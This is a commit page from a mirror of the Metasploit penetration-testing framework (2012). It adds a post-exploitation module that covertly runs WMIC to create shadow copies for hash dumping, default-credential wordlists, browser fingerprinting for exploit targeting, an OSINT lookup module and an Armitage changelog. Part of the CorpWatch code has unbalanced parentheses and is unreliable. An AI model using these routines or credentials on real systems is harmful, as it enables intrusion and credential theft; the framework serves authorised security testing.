infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of r7.github.com:rapid7/metasploit-framework

unstable
Jonathan Cran 2012-01-05 18:26:26 -06:00
parent c522514030 54bca49ef9
commit bedc34ad44
60 changed files with 2294 additions and 100 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/armitage/armitage.jar
View File

Binary file not shown.

68
data/armitage/whatsnew.txt
View File

@ -1,6 +1,74 @@
Armitage Changelog
==================
5 Jan 12
--------
- Armitage d-server now transmits hosts, service, and session state only
when something has changed. This makes teaming much snappier.
- Uploading an imported hosts file now shows a progress dialog.
- File browser upload function no longer blocks the user interface in team
mode. A progress dialog is shown for uploading larger files.
- Removed Ctrl+R refresh hosts shortcut from graph view (it's no longer
necessary)
- Armitage now exits if it was unable to connect to the collaboration server.
- Hosts -> NMap Scans and Hosts -> MSF Scans dialogs are now populated with
the selected values from the target area by default.
- You may now interact with a Windows command shell through Java meterpreter.
- Armitage no longer shows Webcam Shot option through Java meterpreter.
- Armitage now detects when it does not have read permissions for the database
YAML file and prompts with something helpful. Before it would just freeze
with a blank dialog. Not helpful. :)
- Armitage now only shows services that are open.
- View -> Reporting -> Export Data now has the capability of dumping the whole
database (not just the current workspace).
- Added a dialog to View -> Reporting Export Data. Now you have the ability to
dump all hosts or choose to dump one of the dynamic workspaces. This gives
you a lot of flexibility with which hosts are included.
- Cleaned up exported output of vulnerabilities in the Metasploit database:
-- duplicate entries are collapsed to one (this was the fault of my query)
-- refs column contains references separated by a comma and a space
-- added info and module columns. The module column indicates the appropriate
Metasploit module
-- Metasploit modules now populate name, info, and module in an appropriate
way.
- Values exported to TSV are cleaned up such that newlines are replaced with a
literal \n and tabs are converted to three spaces.
30 Dec 11 - last release of the year?
---------
- Hosts -> Clear Database now clears the sessions and clients tables
- Fixed a bug preventing dynamic workspace port/session filter from
working on a fresh database. This was a fun one. This only affected
folks with a completely fresh database and because Hosts -> Clear
Database didn't clear everything, this went unnoticed until now.
- Added various reverse shell payloads to payload helper dialog.
- Added file chooser helper for SigningCert and SigningKey options.
- Added hack to return correct route info when setting up pivoting through
Java meterpreter.
- Armitage now posts a note to the event log when a user starts a browser
exploit or a server module.
- Armitage now supports dragging and dropping a module onto a host in graph
and table view. This action opens the module launcher configured to work
with that host.
- Drastically rewrote MSF Scans. MSF Scans now intelligently builds a list
of ports to scan based on what Metasploit can do. After an initial port
scan, MSF Scans runs discovery modules against relevant hosts. As a bonus
you will see all of the output of these scans.
- Enhanced the Windows heuristic used to guess which OS image to display
- The deconfliction server throttle is now less draconian about how long it
throttles a call.
- Armitage no longer posts to the event log from the UI thread (this will
prevent the UI from blocking in some cases)
- Command shell now handles interaction with d-server in a separate thread
from the UI thread. This will prevent UI blocking in some cases.
- Added Ping Sweep... option for non-Windows meterpreter sessions. Now Java
meterpreter users have a quick host discovery option.
- Change Host OS option now matches new Metasploit database schema.
- Deconfliction server now sets LHOST to the IP address you provided. Also,
Armitage clients do not overwrite LHOST once it is set.
- Interacting with a shell in team mode no longer blocks UI to communicate
with d-server.
12 Dec 11
---------
- Armitage teaming mode now downloads the resulting file for any fileformat

3
data/wordlists/http_default_pass.txt
View File

@ -12,3 +12,6 @@ user
system
sys
none
xampp
wampp
ppmax2011

3
data/wordlists/http_default_userpass.txt
View File

@ -4,3 +4,6 @@ admin 1234
cisco cisco
cisco sanfran
private private
wampp xampp
newuser wampp
xampp-dav-unsecure ppmax2011

3
data/wordlists/http_default_users.txt
View File

@ -8,3 +8,6 @@ security
user
system
sys
wampp
newuser
xampp-dav-unsecure

1
data/wordlists/root_userpass.txt
View File

@ -47,3 +47,4 @@ root letmein
root powerapp
root dbps
root ibm
root monitor

1
lib/msf/core/auxiliary/report.rb
View File

@ -19,7 +19,6 @@ module Auxiliary::Report
end
def myworkspace
return @myworkspace if @myworkspace
@myworkspace = framework.db.find_workspace(self.workspace)
end

6
lib/msf/core/exploit/http/client.rb
View File

@ -492,11 +492,15 @@ module Exploit::Remote::HttpClient
end
].compact
headers ={ 'Authorization' => auth.join(', ') }
headers.merge!(opts['headers']) if opts['headers']
# Send main request with authentication
r = c.request_cgi(opts.merge({
'uri' => path,
'method' => method,
'headers' => { 'Authorization' => auth.join(', ') }}))
'headers' => headers }))
resp = c.send_recv(r, to)
unless resp.kind_of? Rex::Proto::Http::Response
return [nil,nil]

203
lib/msf/core/post/windows/shadowcopy.rb Normal file
View File

@ -0,0 +1,203 @@
require 'msf/core/post/windows/services'
module Msf
class Post
module Windows
# Based on the research from Tim Tomes and Mark Baggett, at
# http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html
module ShadowCopy
include Msf::Post::Windows::WindowsServices
def get_vss_device(id)
result = get_sc_param(id,'DeviceObject')
end
def vss_list
ids = vss_get_ids
shadow_copies = []
ids.each do |id|
print_status "Getting data for Shadow Copy #{id} (This may take a minute)"
shadow_copies << get_sc_details("\"#{id}\"")
end
return shadow_copies
end
def vss_get_ids
result = wmicexec('shadowcopy get id')
ids = result.scan(/\{\w{8}-\w{4}-\w{4}-\w{4}-\w{12}\}/)
return ids
end
def vss_get_storage
storage={}
storage['AllocatedSpace'] = vss_get_storage_param('AllocatedSpace')
storage['MaxSpace'] = vss_get_storage_param('MaxSpace')
storage['UsedSpace'] = vss_get_storage_param('UsedSpace')
return storage
end
def get_sc_details(id)
shadowcopy={}
shadowcopy['ID'] = id
shadowcopy['ClientAccessible'] = get_sc_param(id,'ClientAccessible')
shadowcopy['Count'] = get_sc_param(id,'Count')
shadowcopy['DeviceObject'] = get_sc_param(id,'DeviceObject')
shadowcopy['Differential'] = get_sc_param(id,'Differential')
shadowcopy['ExposedLocally'] = get_sc_param(id,'ExposedLocally')
shadowcopy['ExposedName'] = get_sc_param(id,'ExposedName')
shadowcopy['ExposedRemotely'] = get_sc_param(id,'ExposedRemotely')
shadowcopy['HardwareAssisted'] = get_sc_param(id,'HardwareAssisted')
shadowcopy['Imported'] = get_sc_param(id,'Imported')
shadowcopy['NoAutoRelease'] = get_sc_param(id,'NoAutoRelease')
shadowcopy['NotSurfaced'] = get_sc_param(id,'Notsurfaced')
shadowcopy['NoWriters'] = get_sc_param(id,'NoWriters')
shadowcopy['OriginiatingMachine'] = get_sc_param(id,'OriginatingMachine')
shadowcopy['Persistent'] = get_sc_param(id,'Persistent')
shadowcopy['Plex'] = get_sc_param(id,'Plex')
shadowcopy['ProviderID'] = get_sc_param(id,'ProviderID')
shadowcopy['ServiceMachine'] = get_sc_param(id,'ServiceMachine')
shadowcopy['SetID'] = get_sc_param(id,'SetID')
shadowcopy['State'] = get_sc_param(id,'State')
shadowcopy['Transportable'] = get_sc_param(id,'Transportable')
shadowcopy['VolumeName'] = get_sc_param(id,'VolumeName')
return shadowcopy
end
def get_sc_param(id,param_name)
result = wmicexec("shadowcopy where(id=#{id}) get #{param_name}")
result.gsub!(param_name,'')
result.gsub!(/\s/,'')
end
def vss_get_storage_param(param_name)
result = wmicexec("shadowstorage get #{param_name}")
result.gsub!(param_name,'')
result.gsub!(/\s/,'')
end
def vss_set_storage(bytes)
result = wmicexec("shadowstorage set MaxSpace=\"#{bytes}\"")
if result.include?("success")
return true
else
return false
end
end
def create_shadowcopy(volume)
result = wmicexec("shadowcopy call create \"ClientAccessible\", \"#{volume}\"")
retval = result.match(/ReturnValue = (\d)/)
case retval[1].to_i
when 0
print_status("ShadowCopy created successfully")
sc_id = result.match(/ShadowID = ("\{\w{8}-\w{4}-\w{4}-\w{4}-\w{12}\}")/)
return sc_id[1]
when 1
print_error("Access Denied")
when 2
print_error("Invalid Argument")
when 3
print_error("Specified volume not found")
when 4
print_error("Specified volume not supported")
when 5
print_error("Unsupported shadow copy context")
when 6
print_error("Insufficient Storage")
when 7
print_error("Volume is in use")
when 8
print_error("Maximum number of shadow copies reached")
when 9
print_error("Another shadow copy operation is already in progress")
when 10
print_error("Shadow copy provider vetoed the operation")
when 11
print_error("Shadow copy provider not registered")
when 12
print_error("Shadow copy provider failure")
else
print_error("Unknown error")
end
return nil
end
def start_vss
vss_state = wmicexec('Service where(name="VSS") get state')
if vss_state=~ /Running/
print_status("Volume Shadow Copy service is running.")
else
print_status("Volume Shadow Copy service not running. Starting it now...")
begin
ss_result = service_start("VSS")
case ss_result
when 0
print_status("Volume Shadow Copy started successfully.")
when 1
print_error("Volume Shadow Copy already running.")
when 2
print_error("Volume Shadow Copy is disabled.")
print_status("Attempting to re-enable...")
service_change_startup("VSS","manual")
ss_result = service_start("VSS")
if ss_result == 0
return true
else
return false
end
end
rescue
print_error("Insufficient Privs to start service!")
return false
end
end
return true
end
def wmicexec(wmiccmd)
tmpout = ''
session.response_timeout=120
begin
tmp = session.fs.file.expand_path("%TEMP%")
wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmicfl} #{wmiccmd}", nil, {'Hidden' => true})
sleep(2)
#Making sure that wmic finishes before executing next wmic command
prog2check = "wmic.exe"
found = 0
while found == 0
session.sys.process.get_processes().each do |x|
found =1
if prog2check == (x['name'].downcase)
sleep(0.5)
found = 0
end
end
end
r.close
# Read the output file of the wmic commands
wmioutfile = session.fs.file.new(wmicfl, "rb")
until wmioutfile.eof?
tmpout << wmioutfile.read
end
wmioutfile.close
rescue ::Exception => e
print_error("Error running WMIC commands: #{e.class} #{e}")
end
# We delete the file with the wmic command output.
c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
c.close
tmpout.gsub!(/[^[:print:]]/,'') #scrub out garbage
return tmpout
end
end
end
end
end

2
lib/msf/core/rpc/v10/client.rb
View File

@ -71,7 +71,7 @@ class Client
resp = MessagePack.unpack(res.body)
if resp and resp.kind_of?(::Hash) and resp['error'] == true
raise Msf::RPC::ServerException.new(res.code, resp['error_message'] || resp['error_string'], resp['error_class'], resp['error_backtrace'])
raise Msf::RPC::ServerException.new(resp['error_code'] || res.code, resp['error_message'] || resp['error_string'], resp['error_class'], resp['error_backtrace'])
end
return resp

96
lib/msf/ui/console/command_dispatcher/core.rb
View File

@ -88,6 +88,9 @@ class Core
"kill" => "Kill a job",
"load" => "Load a framework plugin",
"loadpath" => "Searches for and loads modules from a path",
"popm" => "Pops the latest module off of the module stack and makes it active",
"pushm" => "Pushes the active or list of modules onto the module stack",
"previous" => "Sets the previously loaded module as the current module",
"quit" => "Exit the console",
"resource" => "Run the commands stored in a file",
"makerc" => "Save commands entered since start to a file",
@ -118,6 +121,8 @@ class Core
@dscache = {}
@cache_payloads = nil
@previous_module = nil
@module_name_stack = []
end
#
@ -2127,8 +2132,9 @@ class Core
return false
end
# If there's currently an active module, go back
# If there's currently an active module, enqueque it and go back
if (active_module)
@previous_module = active_module
cmd_back()
end
@ -2153,6 +2159,94 @@ class Core
driver.update_prompt("#{prompt} #{mod.type}(%bld%red#{mod.shortname}%clr) ", prompt_char, true)
end
#
# Command to take to the previously active module
#
def cmd_previous()
if @previous_module
self.cmd_use(@previous_module.fullname)
else
print_error("There isn't a previous module at the moment")
end
end
#
# Help for the 'previous' command
#
def cmd_previous_help
print_line "Usage: previous"
print_line
print_line "Set the previously loaded module as the current module"
print_line
end
#
# Command to enqueque a module on the module stack
#
def cmd_pushm(*args)
# could check if each argument is a valid module, but for now let them hang themselves
if args.count > 0
args.each do |arg|
@module_name_stack.push(arg)
# Note new modules are appended to the array and are only module (full)names
end
else #then just push the active module
if active_module
#print_status "Pushing the active module"
@module_name_stack.push(active_module.fullname)
else
print_error("There isn't an active module and you didn't specify a module to push")
return self.cmd_pushm_help
end
end
end
#
# Help for the 'pushm' command
#
def cmd_pushm_help
print_line "Usage: pushm [module1 [,module2, module3...]]"
print_line
print_line "push current active module or specified modules onto the module stack"
print_line
end
#
# Command to dequeque a module from the module stack
#
def cmd_popm(*args)
if (args.count > 1 or not args[0].respond_to?("to_i"))
return self.cmd_popm_help
elsif args.count == 1
# then pop 'n' items off the stack, but don't change the active module
if args[0].to_i >= @module_name_stack.count
# in case they pass in a number >= the length of @module_name_stack
@module_name_stack = []
print_status("The module stack is empty")
else
@module_name_stack.pop[args[0]]
end
else #then just pop the array and make that the active module
pop = @module_name_stack.pop
if pop
return self.cmd_use(pop)
else
print_error("There isn't anything to pop, the module stack is empty")
end
end
end
#
# Help for the 'popm' command
#
def cmd_popm_help
print_line "Usage: popm [n]"
print_line
print_line "pop the latest module off of the module stack and make it the active module"
print_line "or pop n modules off the stack, but don't change the active module"
print_line
end
#
# Tab completion for the use command
#

21
lib/msf/ui/console/command_dispatcher/db.rb
View File

@ -948,6 +948,27 @@ class Db
end
end
end
# Handle hostless loot
if host_ranges.compact.empty? # Wasn't a host search
hostless_loot = framework.db.loots.find_all_by_host_id(nil)
hostless_loot.each do |loot|
row = []
row.push("")
row.push("")
row.push(loot.ltype)
row.push(loot.name || "")
row.push(loot.content_type)
row.push(loot.info || "")
row.push(loot.path)
tbl << row
if (mode == :delete)
loot.destroy
delete_count += 1
end
end
end
print_line
print_line tbl.to_s
print_status "Deleted #{delete_count} loots" if delete_count > 0

6
lib/net/ssh/service/forward.rb
View File

@ -249,11 +249,11 @@ module Net; module SSH; module Service
'PeerHost' => remote.host,
'PeerPort' => remote.port,
'Context' => {
'Msf' => options[:msframework],
'MsfExploit' => options[:msfmodule]
'Msf' => session.options[:msframework],
'MsfExploit' => session.options[:msfmodule]
}
)
options[:msfmodule].add_socket(client) if options[:msfmodule]
session.options[:msfmodule].add_socket(client) if session.options[:msfmodule]
info { "connected #{connected_address}:#{connected_port} originator #{originator_address}:#{originator_port}" }

36
lib/rex/exploitation/javascriptosdetect.rb
View File

@ -6,7 +6,7 @@ require 'rex/exploitation/jsobfu'
module Rex
module Exploitation
#
#
# Provides several javascript functions for determining the OS and browser versions of a client.
#
# getVersion(): returns an object with the following properties
@ -26,7 +26,7 @@ module Exploitation
# ua_ver_eq(a, b): returns true if a == b
#
class JavascriptOSDetect < JSObfu
def initialize(custom_js = '', opts = {})
clients = ::Msf::HttpClients
oses = ::Msf::OperatingSystems
@ -37,7 +37,7 @@ class JavascriptOSDetect < JSObfu
* presence of a spoofed User-Agent. OS detection is more fragile and
* requires truthful navigator.appVersion and navigator.userAgent strings in
* order to be accurate for more than just IE on Windows.
**/
**/
function getVersion(){
//Default values:
var os_name;
@ -66,7 +66,7 @@ function getVersion(){
ua_version = opera.version();
if (!os_name) {
// The 'inconspicuous' argument is there to give us a real value on
// Opera 6 where, without it, the return value is supposedly
// Opera 6 where, without it, the return value is supposedly
// 'Hm, were you only as smart as Bjorn Vermo...'
// though I have not verfied this claim.
switch (opera.buildNumber('inconspicuous')) {
@ -154,7 +154,7 @@ function getVersion(){
// implement window.getComputedStyle now. For some reason, checking for
// taintEnabled seems to cause IE 6 to stop parsing, so make sure this
// isn't IE first.
//
//
// Then this is a Gecko derivative, assume Firefox since that's the
// only one we have sploits for. We may need to revisit this in the
// future. This works for multi/browser/mozilla_compareto against
@ -189,7 +189,7 @@ function getVersion(){
arch = "#{ARCH_X86_64}";
}
if (version.match(/Windows/)) {
os_name = "#{oses::WINDOWS}";
os_name = "#{oses::WINDOWS}";
switch(version) {
case "Windows NT 5.0": os_flavor = "2000"; break;
case "Windows NT 5.1": os_flavor = "XP"; break;
@ -594,7 +594,7 @@ function getVersion(){
// IE 6.0.2600.0000, XP SP0 English
// IE 6.0.2800.1106, XP SP1 English
ua_version = "6.0";
os_flavor = "XP";
os_flavor = "XP";
os_sp = "SP0";
break;
case "568515":
@ -698,7 +698,7 @@ function getVersion(){
// but not IE8, regardless of mode
ua_version = "7.0";
}
} else if (document.compatMode) {
} else if (document.compatMode) {
ua_version = "6.0";
} else if (window.createPopup) {
ua_version = "5.5";
@ -726,7 +726,7 @@ function getVersion(){
// Then this is Gecko and we can get at least os_name without the
// useragent
version = navigator.oscpu.toLowerCase();
} else {
} else {
// All we have left is the useragent and we know it's lying, so don't bother
version = " ";
}
@ -756,9 +756,9 @@ function getVersion(){
else if (version.indexOf("fedora") != -1) { os_flavor = "Fedora"; }
else if (version.indexOf("android") != -1) { os_flavor = "Android"; }
}
//--
// Language
// Language
//--
if (navigator.systemLanguage) {
// ie
@ -768,12 +768,12 @@ function getVersion(){
os_lang = navigator.language;
} else {
// some other browser and we don't know how to get the language, so
// just guess english
// just guess english
os_lang = "en";
}
//--
// Architecture
// Architecture
//--
if (typeof(navigator.cpuClass) != 'undefined') {
// Then this is IE or Opera9+ and we can grab the arch directly
@ -791,7 +791,7 @@ function getVersion(){
// platform
version = navigator.platform;
//document.write(version + "\\n");
// IE 8 does a bit of wacky user-agent switching for "Compatibility View";
// IE 8 does a bit of wacky user-agent switching for "Compatibility View";
// 64-bit client on Windows 7, 64-bit:
// Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0)
// 32-bit client on Windows 7, 64-bit:
@ -817,10 +817,10 @@ function searchVersion(needle, haystack) {
var found_version;
if (index == -1) { return; }
found_version = haystack.substring(index+needle.length+1);
if (found_version.indexOf(' ') != -1) {
if (found_version.indexOf(' ') != -1) {
// Strip off any junk at the end such as a CLR declaration
found_version = found_version.substring(0,found_version.indexOf(' '));
}
}
return found_version;
}
@ -849,7 +849,7 @@ function ua_ver_cmp(ver_a, ver_b) {
b_rest = b[i].substr(b_int.toString().length);
if (a_int < b_int) {
return -1;
} else if (a_int > b_int) {
} else if (a_int > b_int) {
return 1;
} else { // ==
// Then we need to deal with the stuff after the ints, e.g.:
@ -863,7 +863,7 @@ function ua_ver_cmp(ver_a, ver_b) {
// Just give up and try a lexicographical comparison
if (a_rest < b_rest) {
return -1;
} else if (a_rest > b_rest) {
} else if (a_rest > b_rest) {
return 1;
}
}

2
modules/auxiliary/admin/officescan/tmlisten_traversal.rb
View File

@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'BID', '31531' ],
[ 'URL', 'http://www.trendmicro.com/ftp/documentation/readme/OSCE_7.3_Win_EN_CriticalPatch_B1372_Readme.txt' ],
],
'Author' => [ 'Anshul Pandey <anshul999@gmail.com>', 'patrick' ],
'Author' => [ 'Anshul Pandey <anshul999[at]gmail.com>', 'patrick' ],
'License' => MSF_LICENSE
)

2
modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb
View File

@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary
'Author' =>
[
'sid', # Original POC
'TheLightCosine <thelightcosine@gmail.com>' # msf module
'TheLightCosine <thelightcosine[at]gmail.com>' # msf module
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',

4
modules/auxiliary/dos/ssl/dtls_changecipherspec.rb
View File

@ -27,8 +27,8 @@ class Metasploit3 < Msf::Auxiliary
ChangeCipherspec Datagram before a ClientHello.
},
'Author' => [
'Jon Oberheide <jon@oberheide.org>', #original code
'TheLightCosine <thelightcosine@gmail.com>' # metasploit module
'Jon Oberheide <jon[at]oberheide.org>', #original code
'TheLightCosine <thelightcosine[at]gmail.com>' # metasploit module
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',

2
modules/auxiliary/dos/windows/appian/appian_bpm.rb
View File

@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
Enterprise Business Suite service.
},
'Author' => [ 'guiness.stout <guinness.stout@gmail.com>' ],
'Author' => [ 'guiness.stout <guinness.stout[at]gmail.com>' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$',
'References' =>

2
modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb
View File

@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
without SP1 does not seem affected by this flaw.
},
'Author' => [ 'laurent.gaffie[at]gmail.com', 'hdm' ],
'Author' => [ 'Laurent Gaffie <laurent.gaffie[at]gmail.com>', 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>

535
modules/auxiliary/gather/corpwatch_lookup_id.rb Normal file
View File

@ -0,0 +1,535 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rexml/document'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'CorpWatch Company ID Information Search',
'Description' => %q{
This module interfaces with the CorpWatch API to get publicly available
info for a given CorpWatch ID of the company. If you don't know the
CorpWatch ID, please use the corpwatch_lookup_name module first.
},
'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
'References' =>
[
[ 'URL', 'http://api.corpwatch.org/' ]
]
))
register_options(
[
OptString.new('CW_ID', [ true, "The CorpWatch ID of the company", ""]),
OptString.new('YEAR', [ false, "Year to look up", ""]),
OptBool.new('GET_LOCATIONS', [ false, "Get locations for company", true]),
OptBool.new('GET_NAMES', [ false, "Get all registered names ofr the company", true]),
OptBool.new('GET_FILINGS', [ false, "Get all filings", false ]),
OptBool.new('GET_CHILDREN', [false, "Get children companies", true]),
OptInt.new('CHILD_LIMIT', [false, "Set limit to how many children we can get", 5]),
OptBool.new('GET_HISTORY', [false, "Get company history", false])
], self.class)
deregister_options('RHOST', 'RPORT', 'VHOST', 'Proxies')
end
def cleanup
datastore['RHOST'] = @old_rhost
datastore['RPORT'] = @old_rport
end
def run
# Save the original rhost/rport in case the user was exploiting something else
@old_rhost = datastore['RHOST']
@old_rport = datastore['RPORT']
# Initial api.corpwatch.org's rhost and rport for HttpClient
datastore['RHOST'] = 'api.corpwatch.org'
datastore['RPORT'] = 80
loot = ""
uri = "/"
uri << (datastore['YEAR']) if datastore['YEAR'] != ""
uri << ("/companies/" + datastore['CW_ID'])
res = send_request_cgi({
'uri' => uri + ".xml",
'method' => 'GET'
}, 25)
if res == nil
print_error("No response from server.")
return
end
begin
doc = REXML::Document.new(res.body)
rescue
print_error("Malformed XML or broken response")
return
end
root = doc.root
if doc.root == nil
print_error("No document root, no results returned")
return
end
elements = root.get_elements("result")
if elements == nil || elements.length == 0
print_error("No results returned")
return
end
results = elements[0]
if results == nil
print_error("No results returned")
return
end
elements = results.get_elements("companies")
if elements == nil || elements.length == 0
print_error("No companies returned")
return
end
results = elements[0]
if results == nil || results.elements == nil
print_error("No results returned")
return
end
results.elements.each { |e|
loot << ("CorpWatchID: " + (cwid = grab_text(e, "cw_id")))
loot << ("\nCentral Index Key " + (cik = grab_text(e, "cik")))
loot << ("\nName: " + (name = grab_text(e, "company_name")))
loot << ("\nIRS Number: " + (irsno = grab_text(e, "irs_number")))
loot << ("\nSIC Code: " + (sic_code = grab_text(e, "sic_code")))
loot << ("\nSector: " + (sector = grab_text(e, "sector_name")))
loot << ("\nSource: " + (source = grab_text(e, "source_type")))
loot << ("\nAddress: " + (address = grab_text(e, "raw_address")))
loot << ("\nCountry: " + ( country = grab_text(e, "country_code")))
loot << ("\nSub-Division: " + (subdiv = grab_text(e, "subdiv_code")))
loot << ("\nTop Parent CW_ID: " + (top_parent = grab_text(e, "top_parent_id")))
loot << ("\nNumber of parents: " + (num_parents = grab_text(e, "num_parents")))
loot << ("\nNumber of children: " + (num_children = grab_text(e, "num_children")))
loot << ("\nMax searchable year: " + (max_year = grab_text(e, "max_year")))
loot << ("\nMinimum searchable year: "+ (min_year = grab_text(e, "min_year")))
loot << "\n\n\n"
print_status("Basic Information\n--------------------")
print_status("CorpWatch ID: " + cwid)
print_status("Central Index Key (CIK): " + cik)
print_status("Full Name: " + name)
print_status("IRS Number: " + irsno)
print_status("SIC Code: " + sic_code)
print_status("Sector: " + sector)
print_status("Source Type: " + source)
print_line("")
print_status("Address and Location Information\n-----------------------------")
print_status("Full Address: " + address)
print_status("Country Code: " + country)
print_status("Subdivision: " + subdiv)
print_line("")
print_status("Parent and Children Information\n---------------------------")
print_status("Top Parent ID: " + top_parent)
print_status("Number of parent companies: " + num_parents)
print_status("Number of child companies: " + num_children)
print_status("Max lookup year: " + max_year)
print_status("Min lookup year: " + min_year)
}
if datastore['GET_LOCATIONS']
res = send_request_cgi(
{
'uri' => uri + "/locations.xml",
'method' => 'GET'
}, 25)
if res == nil
print_error ("Server down or bad response")
return
end
begin
doc = REXML::Document.new(res.body)
rescue
print_error("Query returned bad or poorly formatted data.")
return
end
root = doc.root
elements = root.get_elements("result")
if elements == nil || elements.length == 0
print_error("no results returned")
return
end
results = elements[0]
if results == nil
print_status("No results returned")
else
results = results.get_elements("locations")[0]
results.elements.each { |e|
loot << ("CorpWatch ID: " + (cwid = grab_text(e, "cw_id")))
loot << ("\nCountry code: " + (country_code = grab_text(e, "country_code"))
loot << ("\nSubdivision code: " + (subdiv_code = grab_text(e, "subdiv_code")))
loot << ("\nType: " + (type = grab_text(e, "type")))
loot << ("\nFull address: " + full_address = grab_text(e, "raw_address")))
loot << ("\nStreet 1: " + (street1 = grab_text(e, "street_1")))
loot << ("\nStreet 2: " + (street2 = grab_text(e, "street_2")))
loot << ("\nCity: " + (city = grab_text(e, "city")))
loot << ("\nState: " + (state = grab_text(e, "state")))
loot << ("\nZIP: " + (zip = grab_text(e, "postal_code")))
loot << ("\nDate valid: " + (date_valid = grab_text(e, "date")))
loot << ("\nMax searchable year: " + (max_year = grab_text(e, "max_year")))
loot << ("\nMin searchable year: " + (min_year = grab_text(e, "min_year")))
loot << "\n\n\n"
print_line("")
print_status("Detailed Location Information\n----------------------------------")
print_status("Country Code: " + country_code)
print_status("Subdivision: " + subdiv_code)
print_status("Residential/Business address: " + type)
print_status("Full Address: " + full_address)
print_status("Street 1: " + street1)
print_status("Street 2: " + street2)
print_status("City: " + city)
print_status("State:" + state)
print_status("Postal Code: " + zip)
print_status("Date address was valid: " + date_valid)
print_status("Max lookup year: " + max_year)
print_status("Min lookup year: " + min_year)
}
end
end
if datastore['GET_NAMES']
res = send_request_cgi(
{
'uri' => uri + "/names.xml",
'method' => 'GET'
}, 25)
if res == nil
print_error("Server down or bad response")
return
end
begin
doc = REXML::Document.new(res.body)
rescue
print_error("Query returned bad or poorly formatted XML")
return
end
root = doc.root
if root == nil
print_error("document root nil")
return
end
elements = root.get_elements("result")
if elements == nil || elements.length == 0
print_error("Returned no or broken results")
return
end
results = elements[0]
if results == nil
print_status("No results returned")
else
results = results.get_elements("names")[0]
results.elements.each { |e|
loot << ("Name: " + (name = grab_text(e, "company_name")))
loot << ("\nSource: " + (source = grab_text(e, "source")))
loot << ("\nDate: " + (date = grab_text(e, "date")))
loot << ("\nMax searchable year: " + (max_year = grab_text(e, "max_year")))
loot << ("\nMin searchable year: " + (min_year = grab_text(e, "min_year")))
loot << "\n\n\n"
print_line("\n")
print_status("Detailed Name Information\n---------------------------")
print_status("Name: " + name)
print_status("Source: " + source)
print_status("Date valid: " + date)
print_status("Max lookup year: " + max_year)
print_status("Min lookup year: " + min_year)
}
end
end
if datastore['GET_FILINGS']
res = send_request_cgi(
{
'uri' => uri + "/filings.xml",
'method' => 'GET'
}, 25)
if res == nil
print_error("Server down or response broken")
return
end
begin
doc = REXML::Document.new(res.body)
rescue
print_error("Query return bad or broken data")
return
end
root = doc.root
elements = root.get_elements("result")
if elements == nil || elements.length == 0
print_error("Results were either broken or not returned")
return
end
results = elements[0]
if results == nil
print_status("No results returned")
else
elements = results.get_elements("filings")
if elements == nil
print_error("Results broken or not returned")
return
end
results = elements[0]
if results == nil
print_status("No filings found")
else
results.elements.each { |e|
loot << ("Central Index Key: " + (cik = grab_text(e, "cik")))
loot << ("\nYear filed: " + (year_filed = grab_text(e, "year")))
loot << ("\nQuarter filed: " + (quarter_filed = grab_text(e, "quarter")))
loot << ("\nReport period: " + (report_period = grab_text(e, "period_of_report")))
loot << ("\nFiling date: " + (filing_date = grab_text(e, "filing_date")))
loot << ("\nForm 10k: " + (form10k = grab_text(e, "form_10K_url")))
loot << ("\nSEC21: " + (sec21 = grab_text(e, "sec_21_url")))
loot << ("\nIs a filer: " + (is_filer = grab_text(e, "company_is_filer")))
loot << "\n\n\n"
print_line("\n")
print_status("Detailed Filing Information\n---------------------")
print_status("Central Index Key: " + cik)
print_status("Year filed: " + year_filed)
print_status("Quarter Filed: " + quarter_filed)
print_status("Report Period: " + report_period)
print_status("Filing Date: " + filing_date)
print_status("10K Filing Form: " + form10k)
print_status("SEC 21 Form: " + sec21)
print_status("Company is active filer: " + (is_filer == "1" ? "true" : "false"))
}
end
end
end
if datastore['GET_CHILDREN']
child_uri = (uri + "/children.xml")
if datastore['CHILD_LIMIT'] != nil
child_uri << "?limit=#{datastore['CHILD_LIMIT']}"
print_status("Limiting children results to 5")
end
res = send_request_cgi(
{
'uri' => child_uri,
'method' => 'GET'
}, 25)
if res == nil
print_error("Server down or bad response")
return
end
begin
doc = REXML::Document.new(res.body)
rescue
print_error("Query return bad or broken data")
return
end
root = doc.root
elements = root.get_elements("result")
results = elements[0]
if results == nil
print_status("No results were returned.")
else
results = results.get_elements("companies")[0]
if results == nil
print_status("No results returned")
else
results.elements.each { |e|
loot << ("CorpWatch ID: " + (cwid = grab_text(e, "cw_id")))
loot << ("\nCentral Index Key: " + (cik = grab_text(e, "cik")))
loot << ("\nCompany Name: " + (name = grab_text(e, "company_name")))
loot << ("\nIRS number: " + (irsno = grab_text(e, "irs_number")))
loot << ("\nSIC Code: " + (sic_code = grab_text(e, "sic_code")))
loot << ("\nSector: " + (sector = grab_text(e, "sector_name")))
loot << ("\nSource: " + (source = grab_text(e, "source_type")))
loot << ("\nAddress: " + (address = grab_text(e, "raw_address")))
loot << ("\nCountry: " + (country = grab_text(e, "country_code")))
